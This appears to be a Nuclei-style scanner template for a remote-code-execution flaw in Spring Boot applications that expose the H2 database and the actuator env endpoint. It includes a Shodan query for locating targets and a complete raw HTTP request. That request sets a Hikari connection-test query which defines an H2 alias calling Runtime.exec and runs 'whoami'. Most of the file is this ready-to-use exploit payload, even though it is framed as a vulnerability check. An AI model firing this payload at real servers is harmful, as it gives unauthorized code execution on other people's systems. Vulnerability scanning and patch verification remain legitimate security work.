id: SpringBoot-H2db-Rce
info:
  name: Spring Boot H2 Database RCE
  author:
  - l0ne1y
  tags:
  - springboot
  - rce
  - jolokia
  description: |-
    SpringBoot H2DB RCE
    H2提供了一个十分方便的web控制台用于操作和管理数据库内容; 功能完整,支持标准SQL和JDBC。而SpringBoot中继承H2的插件H2DB存在一个RCE，该漏洞可导致攻击者远程执行恶意代码。
  severity: high
  metadata:
    shodan-query: http.favicon.hash:116323821
  remediation: |-
    #### 官方修复方案：
    升级系统至无漏洞版本，或于官网下载安全补丁。
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'
  matchers-condition: and
  raw:
  - |
    POST /actuator/env HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/json

    {
      "name":"spring.datasource.hikari.connection-test-query",
      "value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"
    }
